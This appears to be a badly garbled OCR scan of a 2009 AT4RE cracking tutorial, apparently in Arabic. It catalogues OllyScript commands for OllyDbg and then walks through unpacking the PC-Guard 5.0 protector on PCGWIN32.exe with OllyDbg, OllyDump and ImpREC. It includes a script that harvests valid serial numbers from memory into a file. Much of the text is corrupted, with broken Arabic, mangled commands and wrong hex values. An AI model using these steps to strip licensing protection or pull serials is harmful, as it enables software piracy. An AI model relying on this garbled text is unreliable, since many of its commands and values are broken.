loop: 

find start, H+60+ ya ursdróda el 
cmp SRESULT,O 
je end ES 
mov star 01d loo Mbndo 1ó our dad lao! 
SRESULT+1 start 

add count, 1 fm gala 


jmp loop 
end: 
end: 


endsearch ca 


msg count [Ed HOME BOO 


:BPOND 


BPCND addr, cond | / E 


O IIS 2009 6D—— 


lol lug as om loeSuagc: ATARE Olly vdd plz close 


aóJos coló dior add cond ¿solis 


bpend 401000, 


"Al==1" 
BPGOTO adar, label 
ló)) vit label cvs! gu 
mov addr, 64A000 
bp addr 


bpgoto addr, notice 


notice: 
msg "Break Point set correctly" 


BPHWC [adadr] 


bphwc 64A000 


m1 7 


del yo lí 
AT ! 


cm w 


bphws 64A000, "w" 


BPL addr, expr 


BPLCND addr, expr, cond 


obáo sazonar z cdi cond ¿soslscoVaddr d+ 
bpl addr, "eax", "ecx ==0" 


BPMC [adadr] 


alo ro roo ol addr 


BPRM adadr, size 


LS id ¿nl y iso ÚS Pje Ús: E ad dr dd size 


abi 0 U cada do lll 2009 


Pes J 


“ay 


lla de 


Pas J 


Gia) 


lla de 


Vas J 


E) 


La 


Vas J 


Gia) 


lla de 


Pas J 


a) 


la 


Pacs J 


la d 


Pas J 


EPREHWC 


EPREHWS 


BPL 


EPLON 


EBPMC 


BPRA 


ld les iaa Ives oagz: ATARE Olly gusmsdia: ilus z 


bprm 64A000, 08 a) 
EBPWM 


BPWM addr, size ES 


Eso sacos soria Naddriadsize Pes d 
bpwm 64A000, 08 cid 
BUF 


BUF var la Ed 


000% Ves d 
mov str, "DEDE" cid 
msg str 


buf str 
msg str 


CMP 
CMP dest, src [size] (ya iz 
doi jad Ecos? ¿uosredó destisodsize Ves J 
cmp y, X cad 
cmp eip, 401000, 4 
caMT 


CMT addr, comment la Ed 


y sd 
cmt eip, "This is the cia) 
OEP" 


LS¿goóuycommenticalsaol 


COB 


COB (a 2 
colualiopoa, A serle dGoNdo JEOB y es J 


3d 


COoE 
COI E 
cola opa, Joe Es vale luizione, ¿CG UI EOE Pad 
Ea) 
DEE 
lla e 
y sd 
DES 
lla de 
y sd 
DEC 


la de 


y sd 
mov var, B Gia) 


all ly 0d zado lll 2009 (3) — 


lei lug as om loeS age: ATARE Olly vdd plz classe 


dec var 
msg var 


DIV op1, op2 


:0p2 0ua loz 5dop1 


mov opi, 12. 
mov 0p2, 6 


Su yzop1=2divop1, op2 


DM adar, size, file 


A) dump( us? 
dm eip, 1000, "cAdump.bin" 


DMA adadr, size, file 


a cl Dado te Ss Ya EOS k o! “add h cía] size yÉ 


dma eip, 1000, "cAdump.bin" 


1 file loa 


DPE file, ep 


AfileouJosz 

dpe "ciidump.exe", 

eip 

EOB label 


3yeodlzo, AE ÍO alió label Goo salodledón 


EOE label 


CMS label 50 ML aló Idendo 
eoce end: 


ERUN 


olgo allisicos! 'd 


ESTI 


32 is00 SHIFT-F7 


ESTO 


Id AL) ESTI 


EVAL "string with (var]" 


ali 0 U cada do ll pal 2009 


lla e 
y es y 


la de 


Pas J 


ia) 


Ud: 
l es d 


E 


Pas J 


La dz 


Peg J 


A) 


la dz 


DIV 


DM 


DMA 


DPE 


EOB 


EOE 


ERUN 


ESTI 


ESTO 


EVAL 


luis leg as ay lvesuasz: ATARE Olly vdd iy Plz wired. e 


Pes y 
mov x, 1F “ay 
eval "the value of x is (x]" 1 
EXEC/E 
cae NIDE 
lya Ed 
Pas d 
mov X, "eax" cad 
mov y, "401000" 
exec 
xor (x), 03) 
add (x), (y) 
ende 
HILL 
FILL addr, len, value (ia 2 
de lg os dz value 0d len a Ves y 
fill 401000, FF, 90 OPzóbo ] cad 
FIND 
FIND addr, expr pa 2 
Pas d 
find eip, HGAFFESH | 
FINDCA 
oa LLS 
Ilya EG 
Ia sido > add Pas y 
3d 
FINDC 
Aa MD 
lya Ed 
Pas d 
findcmd eip, "push O" A) 
findcmd eip, "cmp al,dl; setne bl; 
not ebx" 
FINDOP 
FINDOP addr, opcode ls 2 
e 5d 
findop eip, 3377?H . - cid 
FINDM 
FINDMEM val [, StartAddr [y 3, E 
sz vall códo loo! Mal 


all ly 0d cado lll 2009 (5) — 


ara lug OM llESUAgc: ATARE Olly 90d iva le qluedogt 


findmem H6A00H 3d 
FREE 


FREE addr [, size] (5 2 


¿uajoJldhs a (e Sad ód  y áaia exi )ALLOC Jucale >addrocedsize sd yace y as d 
da eleod size LidzosuaJó) acu sa 


3d 


CEPR 
GBPR Lai 


¿kosa Pas dy 


100520 
2004 coso 
400520 (ob) 

GBPR ad) 
cmp SRESULT, 10 
je SelectNormalBP 
cmp SRESULT, 20 
je SelectMemBP 
cmp SRESULT, 40 
je SelectHwBP 


jmp NextBP 
EC 


GCI addr, info a e 


Pads J 


fpu lao o 


SOÍó aj OE. 


GONE. 


gci 401000, cad 
destination 
ECMT 


GCMT addr les e 


EA ad0y isos lsool'addr Pad 


all ly 0d zado lll 2009 


ld logs amo les agz: ATARE Olly Jodido: Plz lada T 


gemt 40D1F5 


GMA name, info 


MODULEBASE, MODULESIZE, CODEBASE, : co 3 
CODESIZE, MEMBASE, MEMSIZE, ENTRY, NSECT, DATABASE, RELOCTABLE, 
RELOCSIZE, RESBASE, RESSIZE, IDATABASE, IDATATABLE, EDATATABLE, EDATASIZE 


gma "crackme", codebase 
msg SRESULT 


GMEMI addr, info 


MEMORYBASE, MEMORYSIZE, z 
MEMORYOWNER 


gmemi eip, memorysize 
msg SRESULT 


GMI adar, info 


El )module( Emus dE : 
MODULEBASE, MODULESIZE, CODEBASE, dE Sl dnyali; ES 
dóccsóÍl CODESIZE, MEMBASE, MEMSIZE, ENTRY, NSECT, DATABASE, RELOCTABLE, 
RELOCSIZE, RESBASE, RESSIZE, IDATABASE, IDATATABLE, EDATATABLE, EDATASIZE, 


NAME, PATH, VERSION 


entry 
SRESULT, gma 
GN addr 
A > 
gd! IZ API ¿lla " 
gn eip 
msg SRESULT 
GO addr 


¿0 suo jasá ligoo!' 
go eip + 1000 


GPA proc, lib 


A INS 


oy 
EMA 


lla e 


Vas J 


| 


CMEMI 
lla de 


Peg J 


ay 


EMI 
lla de 


Pacs J 


Gia) 


EN 


Peg J 


A) 


co 
La de 


Peg J 


cad 


GCPA 


Pas J 


li lees ui Ives a sz: ATARE Olly Sum diy: leirloe dose 


gpi "CreateFileW", "kernel32.dll" Gál 


HMAINTHREAD, PROCESSID, HPROCESS, óGsl 


,MAINTHREADID, 


,CURRENTDIR EXEFILENAME, PROCESSNAME, MAINBASE, 
SYSTEMDIR 


gpi PROCESSID y Ss ye ¿id 


GREF [instance] (ES E 


" Pes d 


instance ¿aJgd0 »oldqledoz. 


mov instance, 1 

find eip, "xor al,al" 

next: 

cmp SRESULT, O 

je finish 

gref instance 

wrta "found.txt", SRESULT, 


jmp next 

finish: 

msg "check the file found.txt for 
search results" 


ret 
ITOA n [, base=16] la E 
tueod (yo a le n lo Gun ya exa di Muay base (We 0 dd Gh $) y eS J 
mov y, 01F2 a) 
itoa y 


a ay ud ao lll 


CPI 


GCREF 


INC 


ITOA 


li lees cio Ives a sz: ATARE Olly umd: lodirloe dose 


mov x, "01F2 equivalent in HEX is: " 
+ SRESULT 

msg X 

itoa y,A 

mov x, "01F2 equivalent in Dec is: ' 
+ SRESULT 

msg X 

itoa y,2 

mov x, "01F2 equivalent in BIN is: " 
+ SRESULT 

msg X 

ret 


JMP label 


3590 lilalabel did dojo led 
Loop: 


findcmd eip, "setne al" 


cmp SRESULT, O 
je Finish 


Finish: 
msg "Sorry, Nothing found" 
ret 


KEY vkcode [, shift [, ctrl][ 


shift + F9/ 
ctrl + space / key 20, 0,1 


LBL adar, text 


lbl eip, "This is the 
OEP" 


LCLR 


abi 0 U cada do lll 2009 


La 


Vas J 


ES 


lla de 


Pas J 


AN) 


la de 


Pas J 


Gia) 


lla de 


Pas J 


A) 


lla e 


KEY 


LBL 


Le 


LCOLR 


lia legs at les ago: ATARE 


len "ATARE is my team" 
msg SRESULT 


Im 40100, 1000, 
"dump.bin" 


mov X, 1E 

mov eax, x 

log "ATARE is the best" 
log x 

log eax 


log eax, 


39 


mov Xx, OF 
mov y, "Hello world" 
mov eax, ecx 


mov [403000], "Hello 
world" 


A INS 


SMS dump do 


OllyDbg Log Window z 


Olly 9udbdsdivc ba ecirluEde 


[AFA 


LEN str 


col lio str 


LM adadr, size, filename 
] 


Lio filename Jscoladdr cisd.size 


LOG src [prefix] 


dea lio Nito góndo, 


MOV dest, src [, size] 
] 


5360.) dest ox .size 


Peg J 


“ay 


LEN 


La da 


A) 


la 


Pads J 


Gia) 


Loc 
a 


Vas J 


E) 


MOV 
lla de 


Pas J 


cia) 


MEMCD 


les logs vado lueS aso: ATARE 


03) dao o 
gma "GDI32",CODEBASE 


mov base, SRESULT 
gma "GDI32",CODESIZE 


mov size, SRESULT 


alloc size 
mov dst,SRESULT 


memcpy dst,base,size 


msg "OEP Found!" 


msgyn "Do you want to exit?" 
cmp SResult,0 

je Continue 

Exit: 


msg "Script terminated by user" 


ret 
Continue: 


ig lelleació Base Code! 


Olly 9udbdedivc ba echado 


MEMCPY dest,src,size 


¿diaz Wzaaz 03] Size Code 


MSG message 


2 


0340 y ido 


MSGYN message 
0 ao 5 "NO" ol ae 5 "YES" E Ñ 


MZ 
OMNO" E es 


MUL op1, op2 


JsmoJoplocé ja ¿o0p1i op2 


mov XxX, OF 
mul x, 2 


mov x, 15 
neg X 


A TIN 


dos ¿ut lÓ6dd Ms Complement( )Two's 


NEG op 


lla de 


o J 


¿AA 


lla e 


Vas J 


ia) 


la dz 


Peg J 


A) 


lla e 


Pas J 


Gia) 


la dz 


Pas J 


aa) 


MSG 


MSCOYN 


MUL 


NEC 


luis leg as aya lvesuasz: ATARE Olly ved iy Plz worlds. e 


eval "the 2's complement of 15 is 
pq 

msg SRESULT 

ret 


NOT op ¿il 


IS 


mov x, 15 

not x 

eval "the 1's 
complement of 15 is 
py 

msg SRESULT 

ret 


OR dest, src 


Lo "OR "ÓN desto sres aya loe 5d dest 


a Ccóa Erndos de 


mov y, A2 

mov x, 6B 

or Xx, y 

eval "x OR y = (x]" 
ret 


OPCODE addr 


¿9 JRESULTS LOpcode 632 ' 
d dousatdó lsoo!addr 


.Opcode-1J02 RESULT_2$J + . 
opcode eip 
msg SRESULT 
msg SRESULT_2 


OPENDUMP addr [,base,size] 


ius dig) dumpva os 


opendump eip, eip, 1000 


OPENTRACE 
Jtracewindow(+ 1d Sida: yañas 


PAUSE 


Sula y dad Resume ! 


abi 0 U cada do lll 2009 


lla de 


Pas J 


Gia) 


Pes d 


0) 


labs 


Pas J 


Gia) 


la dz 


lla de 


Pes y 


lla de 


Pas d 


NOT 


OR 


OPCOD 


INMIINIAO 


PAUSE 


lei lug as om loeSuagc: ATARE Olly Ive di Plz classe 


POP dword 


.os 


¿ada Bos 00 a lod Jato 163,50) dword 


PREOP addr 
á 500 ll " 
SNE dl jo da já doo " 
E PREOP ¿9 5 
preop eip 
PUSH dword 
O TA E O ds 
push eax 


push [58C000] 


READSTR str, len 


mov str, "AT4RE is the best" 


readstr str, 5 
msg SRESULT 


REF addr 
.Findreferencesto ¿ies OÍ CTRL+R 6ó4 ibóci ds a 
n 
n 
n 
Goo lagos " 
Repeat: 
ref eip 


log SRESULT 
log SRESULT_1 
log SRESULT_2 
cmp SRESULT, O 
jne Repeat 

ret 


REPL adar, find, repl, len 


calido lódo find codgtaye ld bz repl lállróc:3 e 


8 ay ul dao lll 


POP 
la de 


Pas J 


Gia) 


PREOP 
E 


Ves d 


ad 


PUSH 


La 


READS 


Ae TR 
lya EG 


o J 


A) 


REF 
lla e 


Pas J 


“ay 


REPL 


Olly 90d 5d Iva 


le logs ado loss aso: ATARE 


repl eip, H6A00H, H6AO1H, 10 


repl eip, 475??H, 475004, 1F 
fol 40100, H204, 90H, 1F 


RET 


ola de 


EOpÓs Lo ES 


REV dword 


Ey os 


rev 01234567 
msg SRESULT 


ROL op, count 


5 ja) 40 count Ed Doc; loci d op 


Ca Eydós Esto elo 15d 


rol eax, cl 
rol [58C000], 10 
rol 12345678, 4 


ROR op, count 


god deydó oo rod iso elóozorz Jo 


ror eax, cl 
ror [58C000], 10 


ror 12345678, 4 


RTR 


CTRL + F9 dóvs dáló ció 


OllyDbg JRun till return z: 


RTU 


OllyDbg¿JRuntillusercodez* EÍALT+F9 0d e dbóoóbai 


RUN 


dildo F9Ío Caba N 
SCMPI dest, src [size] 


dió dz alla JM. OS dió E: SOMPI Id ció Zó elvadlóyajod 


died qu á ga "Good" 
mov x, "at4re" 

scmpi x, "ATARE" 

je Good 

msg "Bad" 

Good: 


a ay ul ao lll 


loo dovedst 


E) 


la dz 


Pes J 


lla de 


Pas d 


A) 


lla de 


Pes d 


Gaia) 


lla de 


Pes d 


oa 


lla de 


Pas y 


Pas d 
lla de 


Pas J 


lla de 


Pas d 


A) 


RET 


REV 


ROL 


ROR 


RTR 


erTU 


RUN 


SCMPI 


lag lus ura Ives ago: ATARE 


msg "Good" 
ret 


hl eax, cl 
shl [58C000], 10 
mov x,12345678 


shl x, 4 


du ci Eydós eso Els laz Voz opÉ 


Olly sud sdivo az 


in ga count Es Vo 


SETOPTION 


¿sueoalicizón JOllyDbg 


SHL op, count 


loca d op 


SHR op, count 


hr eax, cl 

shr [58C000], 10 
mov x,12345678 
shr x, 4 


mov strng, "AT4RE" 
msg strng 


buf strng 
msg strng 
str strng 
msg strng 


sub eax, ebx 
sub [58C000], 1000 


A INS 


isis dó E7Íodos! 


digo ESÍo 


'z Into Step JOllyDbg 


ds BUF ¿áy50d (30) var (¿dz sz) Dóge 


dudas OO E Sres 


sTI 


sTO 


STR var 


SUB dest, src 


3 destoáuadiloz jUdest 


TC 


OllyDbg J)Tracing(5sGÍdosiioo 


loo vedat 


SETODT 
La se ION 
y sd 
SHL 
lla de 
y es y 
a) 
SHR 
La d 
y sd 
¿3d 
sTi 
lla de 
y es d 
sro 
lla de 
y es y 
sITR 
E 
, es y 
aa) 
SUB 
La de 
y es y 
TS 
Te 
(La de 
y es d 


Olly 0d dIVo da 


TEST dest, src (a E 
gdl dn Eo depto ¿00 EgddÓz AND do dest o src 20 va Pes d 
la. 
ask "Input x:" Giad 


cmp SRESULT, O 

je canceled 

mov x, SRESULT 
ask "Input y:" 

cmp SRESULT, O 

je canceled 

mov y, SRESULT 
test x, y 

eval "flags after TEST x,y : CF= (ICF) OF= (10OF) PF= (IPFF 
SF= (SF) ZF= (IZF)" 
msg SRESULT 
canceled: 

ret 


TEST 


TiCKvar (a 2 
2 8ó varo cos o oir je da Pas d 
tick var ay 


344205110 lapso li ó 


OllyDbgJTrane Overz: 


VAR var 


a de 


TICR 


VAR 


O II 2009 


li lea di loeSuag: ATARE Olly uds di: ledicluedos e 


XCHG dest, src ll e 
srcóldest Gdest ásredáDos Pad 
xchg eax, ebx 3d 
xchg [58C000], 1F 
xchg [58C100], 
[580200] 
WRTA 
WRTA file, data [,¡separator] pe E 
csdlda file ledodz data o2bó O 2) Ped 
" enla ay: do la 
E 0d lodo did did 


de aa 000] st poo al ea 


Gal jabicióay py dd Ea 20 2 ari a) 


rd 


cod doa yaa ene en yy rss 


es e 
O 


A UI 2009 


lag logs aaa Ives ago: ATARE E E clear. c 


JO 


B04CODDBEA SO AF 4B 6 
B04CDDCO 5 ; FF FF FF FF 
4CDDODEé 
4CODES 
BB4CDOFA 
ABB4CODEGA 
BB4COE1O 
4CDE 
4CDE 
1940 DE49 


ABACDEDO 
an4c DEEO 


e94corOS 
AB4CDF 
ot DF 


AE Lys 


IRE _—> 


sr Uózalo ja ¿orga js q 


Y 


Eo) de 1d IN Ód ¿Gh aude d do cl 
: 15 vasjeye oa FFh 9ue. 


s 


.) 


ep 


As cx EY ¿Ed JS 392 a 


ai Uca lps 2009 


Lage 0 omo luego: ATARE Olly 90d divo aba lesciugloedurge 


mov addr, O0O4CDDEO 
mov instance, O 


"Valid ¿qd: ij dee 9 bh a 
o E 


Serials:" 
Corral WR da a reí 


wrt "serials.txt", "Valid Serials:" 


Q yt Foo ara rs a 


loop: 
cmp [addr], 0 
je end 


wrta "serials.txt", [addr] 
add addr, FF 
inc instance 

jmp loop 


a dores dr 


end: 
itoa instance, 0A 
eval "(S$RESULT) serials were fished" 
msg SRESULT 

ret 


ye aldo ¿e ls 2) (6d serials lbs a 
4 


EolY ás capó lic a 


all ly 0d ao lll 2009 


lar leas diz IES AGE: ATARE Olly vdd PLE las dcIue dose 


Z.00:) Jal PL-GmARD far Win ZLA da 


VIIN 


; PC GUARD FOR W/IN32 


7 e 
E A 
O 


SETS NS vdd CREÓ a Bos ar rd do 5 
LSSI hija » qe ay La ii y ¿E Eua ¿ja jÓ gin 
de) 


a, ua e Jonás Ajó alipicó 


ga 35 lt, 


Uso 35 jaróss la EU pss de JÓ 
y o syja dla pi, y 30 e pa do JS 


Juro be a as pl + Exceptions ¿maya y ¿yes ys ji 


24 


q7 ae E 


Licensing==2 ¿Opa oye culo q il 


0 pe ple il 
dat lÓs y 30 


Loader ¿ta 30 30 OS So ¿ado A 


.ATARE FastScanner 93 Sa PE¡D O SA 
.OllyDbg 

O ox S (0) 
AZ 4 yal y Ca" OllyDump Plugin 


REConstructor Import o) 


SS 
Os AU. 4 


all ly 00 Ja Iboga 2009 


al leas amd lveSgasz: ATARE Olly UT lola ES EA 


S juesislaccidodPCoWIN32.ere O 


12 POGWIN32.exe 


ta Js ó GUÓPEID 3 y FastScanner ATARE 


NOS A 1 
Ed Po GEA u 


¡Pe PEID v0.94 0.60 
File: Book_Tuts|ReversinayUnpacking PC-GUARD|OriginallPIGWIN32.exe 
Entrypoint: 00083000 EP Section: > 
File Offset:  0007B000 First Bytes: | FC,55,50,E8 > 
Linker Info: 6,0 Subsystem:  Win32 GUI > 


PC-Guard 5.0 -> Blagoje Ceklic 
Multi Scan Task Viewer Options About Exit 


Y Stay on top >» -> 


AY mos ST a ve Js 5,0 POsGuard suo dl a ¿ej ato El rl a 


ATARE 3% df jaa egos aaa pia Cua 900 dd ls a cs a ll 


J 1 


Signs_Imitator 


ota JN e pr d eve za Loaderáblyor o 


¿aujya, 


all ly 00 ¿Ja Iboga 2009 Gy—— 


Lagllog 0ug ome les ago: ATARE Olly 0 gd yz Ar 


ICO EPT . as E AN 12 
55d ES Ajos ¿aloja Hue Ualya : ú $e ¿lo O GUA joo 


¿text data ¿rs re 


GU yr, juisalja ¡0 ja y grs pas qa hi ext gold de Strings Alora jajaa od, 
Aj: Se lago 
0] iv 6 


Y 


SE ¿Loader dopado a rd si uadodóye ladra dl: jo dc dÓ 


Aro ento ¿ od deso za. Loader 
Soya ¿ula Ch : 


¿text «data ¿rsre 


RSS PZA 


all ly 0 zado lll 2009 


gala 0 omo lueSLga: ATARE Olly 9035 divo aba leeciugloedurge 


0] Laya Qásl ñ deso 1d Loader == .2 


Window Help Tools 


Appearance 
Debugging options Alt+O 


Just-in-time debugging 
Add to Explorer 


Debugging options “u Options: + sE 


Rao ¿bea Ja: 


all ly Uca lll 2009 Ga —— 


lie lees yz les ago: ATARE Olly 40 dos)! lvl 


= Debugging options 
¡Commands ] Disasm cru J Registers | Stack ] Analysis 1 ] Analysis 2 ] Analysis 3| 
[Security Í Debug Í Events [ Excentions | Trace ] SFX ] Strings J Addresses | 


Cd] Ignore memory access violations in KERNEL32 


Ignore (pass to program) following exceptions: 
O INT3 breaks 


[> Single-step break 

[) Memory access violation 

1 Integer division by D 
[Invalid or privileged instruction 


[) Al FPU exceptions 


[3 Ignore also following custom exceptions or ranges: 


00000004 


A Add last exception 
00000005 O - 
00000096 pl Add range ) 
DODOD6BF | 


DEEDFADE 'y | (O Delete selection) 


AAA mm mm 


ña o e ya ¿Exceptions Aga? li TE do! 


Debug Plugins Options 


Executable modules ¿A!t+E 
Memory Alt+id 


5 + 
(= 


View. Logadióa its gras Jae aa F9 Shift qe so ¿a Exceptionsia ds ad 


Access violation when writing to [557E4B6E] - use Shift+F7/F8/F9 to pass exception to program 


al ly 0 zado lll 2009 


las leg as az Ives gasz: ATARE 


00483343 
00483564 
004836D8 
00483A0D 
7Cc911230 
7Cc911230 
7Cc911230 
00492999 
0049698F 
0046E343 
0046E564 
0046E6D8 
0046EA0D 
7Cc911230 
7Cc911230 
1C911230 
004'7D999 
58B50000 
76040000 
76340000 
7740000 
7C9D0000 
77390000 


0048198F 


77BD0000 
5B090000 


a y a E 


a ay ll ao lll 


sido 1da7 lor 


Access 
Access 
Single 
Single 


INT3 command at ntdl 
INT3 command at ntdl 
INT3 command at ntdl 


Single 
Single 
Access 
Access 
Single 
Single 


INT3 
INT3 
INT3 


Singl 
Modul 
Modul 
Modul 
Modul 
Modul 


Modul 


command at ntdl 
command at ntdl 
command at ntdl 


e 
e 
e 
e 
e 
e 


e 


Olly Uds divo 


3 logo 


FO 
violation when writing 


violation when writing 


step event at PCGWIN32.004836D8 
step event at PCGWIN32.00483A0D 
11 .DbgBreakPoint 
11.DbgBreakPoint 
11 .DbgBreakPoint 
PCGWIN32. 
step event at PCGWIN32. 


step event at 


violation when writing 
violation when writing 


step event at PCGWIN32. 
step event at PCGWIN32. 
11.DbgBreakPoint 
11 .DbgBreakPoint 
11.DbgBreakPoint 


to 
to 


[657EAB6 


E] 


[B4E 


6507E 


] 


00492999 
0049698F 


to 
to 


0046E6D8 
0046EAO0D 


[659 7EAB6E 


Li 


[B4E 


6507E 


iy. 


step event at PCGWIN32.0047D999 
C:AWINDOWSAYsystem32XC0OMCTL32.d11 


C:AWINDOWSAsystem32XIMAG] 


EHLP.dl1 


C:AWINDOWSAsystem32*comd1g32.d11 
C:AWINDOWSYsystem32XSHLWAPI.d11 


ET 


C:AWINDOWSYsystem321SH 


,32.d11 


laca 


y Ai gd, 


0579 Exceptions á2mye gu y tada rd 


Shift + 
shift + 
shift + 
shift + 


F9 
F9 
F9 
F9 


shift + 
shift + 
shift + 
shift + 
shift + 
shift + 


F9 
F9 
F9 
Fr9 
F9 
F9 


shift + F9 


C:AWINDOWSAWinSxSAx86 _Microsoft.Windows.Common- 
Controls 6595b64144ccf1df 6.0.2600.2180_x- 
ww_a84f1ff91comct132.d11 
Single step event at PCGWIN32.0048198F 


Set Memory Breakpoint on Access zásj Lis 
Module C: AWINDOWSYsystem32XV- 


ERSION.dl1 


Module C:IWINDOWSAsystem32Xuxtheme.dl1 


by) TL 


lla 3 Lu 


Log 


Memory 


Debug Plugins Options 


AL 
Executable modules ¿Alt+E 


Threads 


cz Ó sl Set Memory Breakpoint on Access l¿.5h 


shift + F9 


Pe y, Exception 31 3* 


ya 


Ñ 0 5 4 a Si 
Aja jus ¿Ab at 20 Loader 


Memoryóe View: 2 3% 


D— 


Larga leg 0 OMT eS go: ATARE Olly Uds d yc ct 


Bs Actualize 


Wiewe in Disassembler Enter 
Dump in CPU 

Dump 

Search Ctrli+B 
Set break-on-access F2 


DWORD PTR SS: [EBP-18] 
CALL 


Jal a a ro o rd 


Ea or a a e Ed E ET 7” 
Go ad e aaa: 1719 A Fe Sings OSO Eras A 
EN 


ST O 


.OllyDump Plugin yg 3 pio / da 
re dog boli ya lJss y jalbidllo OS ya Q ¿a, NT 4 


abi Uca ll pal 2009 


las leg as yz Ives oasz: ATARE Olly 0 do sd lo PLE EST EA 


Dump debugged process 


OllyDump 
OllyScript 

Olly Hits Snake 
OllyStepNSearch 
Olly'YBHelper 


Find OEP by Section Hop (Trace into) 
Find OEP by Section Hop (Trace over) 


v vv v vi 


Options 


Dump debugged process “u OllyDump “ús Plugins 2 3% 3 


OllyDump - PCGYYIN32.exe (2) 


Start Address: Size: (Coump >») 
Entry Point: > Modiy [25021 |(GetEPasoEP) (Cancel ) 


Base of Code: Base of Data: 


Cd Fix Raw Size 8 Offset of Dump Image 


Sect..  VirtualSize Virtual Off... Raw Size Raw Dífset — Charactaris... 
00024D38 00001000 00024038 00001000 E0000020 
00002152 0002C000 00002152 D0002C000 Co000040 
00013438 0002F000 00013438 0002F000 CO000040 
00055000 00043000 00055000 00043000 E0000040 


O Rebuild Import 
10) Method! : Search JMP[API] | CALL[API] in memory image 
O hMethod2 : Search DLL 2: API name string in dumped file 


ao import Rebuild la Got Jobs : Q 
.Import REConstructor DNA 


Ga Nomdufictier: — [PCGWIN32 Dumped 14) CEnregistrer?) 
rá : ilef* Annuler 
Favoris réseau Type: | Executable file(* exe] Cammuer_) 


E 


all ly Uca llo 2009 Gh — 


luigi las ome lus ag: ATARE Olly Vid Plz 


ESE 


áttach to an áctive Process 


apacking pc-guard+originalpcgwin32.exe (ODODOF?C] e 


¡GE so Je. sAttachto an Active process: 3 3% 9imports-E su juimoagidóL* 


E OS here 4is od a LES a —— 
ps A Y abód sul Y ¿a ia jas ñ y / A 
des y desaboiallo Lo ¿uta drá ja ds 0 a | y 
so dy Segal lo day ¿tro ya dp ds 090 yo aja, Y 
> |AT Infos Needed-———— 


RAYA, [00000000 
Y 
Size (Get Imports ) 


E .. . Ed , m0 efes e 
3 >3Needed InfoslAT gl, iy yarar aii aia y 


 AutoSearch ' 


: AutoSearch 2» Gua 


Found something! (2) 


Found address which may be in the Original 147. Try 'Get Import". 
(Ifitis mot correct, try R'Y4: 0002C000 Size:00002152) 


| 


dr 5 qa al 
ya +8 fa ES Juabvooy aya 


: Get Imports 2» YÍY y 


all ly 0 zado lll 2009 


las leg as yz Ives gasz: ATARE Olly 07 do ME) J ly a PLE RA TIA 


Imported Punctions Found 


adwapi32. dll FThunk:0002C000 NbFunc:2 (decimal: 2] valid:YES 
comctl32. dll FThunk:D002C00C NbFunc:3 (decimal: 3] valid: YES 
adi32.dll FThunk:0002C01C NbFunc:9 (decimal: 9] valid YES 
imagehlp.dll FThunk:0002C044 NbFunc:1 [decimal:1] valid: YES 
2? FThunk:D002C04C NbFunc:44 [decimal:68) valid: NO 

2 FThunk:0002C160 NbFunc:1 (decimal: 1] valid: NO 

shell32.dll FThunk:00020168 NbFunc:3 [decimal:3] valid: YES 
user32. dll FThunk:000201 78 NbFunc:32 (decimal:50] valid: YES 
version.dll FThunk:00020244 NbFunc:3 [decimal:3) valid: YES 
comdlg32.dll FT hunk:0002C254 NbFunc:2 [decimal:2] valid YES 


» 
» 
» 
» 
» 
» 
» 
» 
» 
» 


Ese Imports gg0a*Í sé ¿pis gtc 


O) guadaira) a imports Ylsz 
Qe 100 E % , 


Show Invalid > 


==. Show Invalid Z» VÍ! > 


Mad. UUUIZLCOP + HMMIOO, REITICIOZ. UN DIU, UIOD PIO, Y NL OA MU 
rva:D002C0F8 mod:kemel32. dll ord:036É name:VirtualFree 
rva:DOO2COFC mod:kemel32.dll ord:0205 name:HeapCreate 
rva:D00020100 mod:kernel32. dll ord:0207 name:HeapDestroy 


rva:D00020108 mod:kernel32. dll ord:.01DB name:GetYersion 
rva:DO02010C mod:kemel32. dll ord:0104, name:GetCommandLineá, 


el cstod B Yes q . ce eras pl 4 as Ed 
CS aból LS e ¿by Dos Qu gua lija aia Kernel32.dll :: y di gay 5 ¿yt ÓN 

Y 
CE E ExitProcessueztg 23 GetVersion  HeapDestroyueztg sj óbaa EY 


6 


Import Editor 


all ly 0 ao lll 2009 


lag leas ome lleSUagc: ATARE Olly usd da lan dcIoedusse 


IMPORT EDITOR (2) 


Module 


kemel32. dll 
Function 


ord:0081 name:EnumUlLanguagesá, 

ord:D0B2 name:EnumUlLanguagesw' 

ord:D0B3 name:EnumerateLocalComputerW amesá, 
ord:D0B4 name:EnumerateLocalComputerW amesw' o 
ord:D00B5 name:EraseT ape 

ord:DOB6 name:EscapeCommFunction 

ord:D0B 7 name:ExitProcess 


> 


ord:DOB8 name:ExitT hread 

ord:D00B9 name:Exitv'D M 

ord:DOBA name:ExpandE nvironmentStringsá, 
ord:D0OBB name:ExpandE nvironmentStringsw' 


ord:DOBC name:ExpungeConsoleCommandHistoryá, > 

ord:DOBD name:ExpungeConsoleCommandHistoryw* v 

Name 
A PAYA —— 


ERA Cosa) 


: e Vis ExitProcess de- 


FP NIHISOgernn a E FIAT. DOLLARS MUTUA. 1 UCR, 1] YQNa, ES 
> kemel32.dll FThunk:0002C04C NbFunc:44 [decimal:68)] valid YES 
Y ?FThunk:0002C160 NbFune:1 (decimal: 1] valid: NO 
» - shell32. dl FT Invalidate functions) al:3) valid: YES 
»- userd2.dl FT Disassemble / HexWiewv ral:50) valid:YES 
» - version. dll FT : al:3) valid: YES 
>-comeipaz da] Pese Desa o ai YES 
Trace Level2 (Hook) 
Trace Level3 (Trap Flag) 
Plugin Tracers 
Advanced Commands » 
Cut thunk(s) 
Delete thunk(s) 
YU dad diia je Cl ito al dio gl yo e ojo Maó ¿olmport ¿acia 


Y 
a) vallado 


$ J ¿+-Import ¿al 3 E o ¿ya ya a o lULos ¿ s dy des alo, de ya 5do EA Ív e 


alpine Thunks .Cut 


all ly 0 zado lll 2009 


las leg as yz Ives oasz: ATARE Olly 07 do s J ly a PE lodo z 


Imported Functions Found 
adwapi32. dll FThunk:0002C000 NbFunc:2 (decimal: 2] valid: YES 
comctl32. dll FThunk:0002C00C NbFunc:3 (decimal: 3] valid: YES 
adi32.dll FThunk:0002C01C NbFunc:9 (decimal: 9) valid YES 
imagehlp. dll FThunk:0002C044 NbFunc:1 [decimal:1] valid: YES 
kemel32. dll FThunk:0002C04C NbFunc:44 [decimal:68] valid: YES 
shell32.dll FThunk:00020168 NbFunc:3 [decimal:3] valid: YES 
user32.dll FThunk:000201 78 NbFunc:32 (decimal:50] valid: YES 
version. dll FT hunk:0002C244 NbFunc:3 [decimal:3] valid: YES 
comdlg32.dll FT hunk:0002C254 NbFunc:2 [decimal:2] validYES 


VA V.VVvVv vv 


ump. Me Qs gl ay 
do 


Cro: Duo Fix Dump Dd 


